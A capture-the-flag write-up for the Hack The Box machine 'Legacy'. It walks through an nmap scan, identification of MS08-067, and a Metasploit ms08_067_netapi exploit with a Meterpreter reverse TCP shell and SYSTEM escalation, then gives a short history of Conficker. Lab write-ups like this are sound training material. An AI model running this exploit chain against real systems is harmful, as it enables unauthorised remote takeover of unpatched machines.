tools & techniques
Other

Legacy

Another very easy machine — Legacy is similar to Blue. It shows how quickly a critical vulnerability, left unpatched, can be used to exploit a system in a matter of minutes.

Write Up

Setup

First setup to stay organized:

$ mkdir legacy
$ mkdir legacy/www legacy/nmap legacy/gobuster

Reconnaissance

Initial nmap scan

$ nmap -sC -sV 10.10.10.4 -oA nmap/legacy
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-11 16:05 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.48 seconds

Looks like its blocking our ping-probes. We can confirm this since we can ping the machine:

$ ping 10.10.10.4 PING 10.10.10.4 (10.10.10.4) 56(84) bytes of data.
64 bytes from 10.10.10.4: icmp_seq=1 ttl=127 time=83.4 ms
64 bytes from 10.10.10.4: icmp_seq=2 ttl=127 time=80.7 ms

Lets add the -Pn option, which treats all ports as online:

$ nmap -sC -sV -Pn 10.10.10.4 -oA nmap/legacy
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-11 16:04 EDT
Nmap scan report for 10.10.10.4
Host is up (0.085s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h25m24s, deviation: 2h07m16s, median: -5h55m24s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:1a:2f (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-04-11T20:09:25+03:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.99 seconds

Searching for Windows XP (Windows 2000 LAN Manager) on Google, one of the first results if for people writing aboutMS08-067. From the Microsoft Security Bulletin:

The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.

Exploit

Let's use a MS08-067 module with Metasploit:

$ msfconsole -q
msf6 > search MS08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0

Setting up Metasploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.4:1029) at 2021-04-11 16:47:05 -0400
meterpreter >

And we have a shell! We can escalate our privilege with Meterpreter:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Now we can find the flags.

meterpreter > search -f root.txt
Found 1 result...
c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cd Documents\ and\ Settings\john\Desktop
meterpreter > cat user.txt
meterpreter > search -f root.txt
Found 1 result...
c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cd C:\Documents and Settings\Administrator
\Desktop
meterpreter > cat root.txt

Beyond the Box

History

In October 2008, Microsoft released a security bulletin for a critical bug they classified as MS08-067, which allowed remote code execution through a crafted RPC request. It was used in various attacks, perhaps most notably the Conficker worm.

Conficker infected an estimated 9 to 15 million Microsoft servers, including servers belonging to the French Navy, UK Ministry of Defense, and more were all infected. At the time it was the largest known computer worm infection.

Different variations (A through E) of the worm propagated, defended, and ended differently. However their initial infection vector had one consistent method: MS08-067.

In 2011, the Ukrainian police and the FBI arrested three Ukrainians and a Swede in relation to the Conficker.

Read the Wikipedia article on Conficker here.

The Exploit

Like EternalBlue, the exploit comes down to a buffer overflow. An example of exploit can be found here.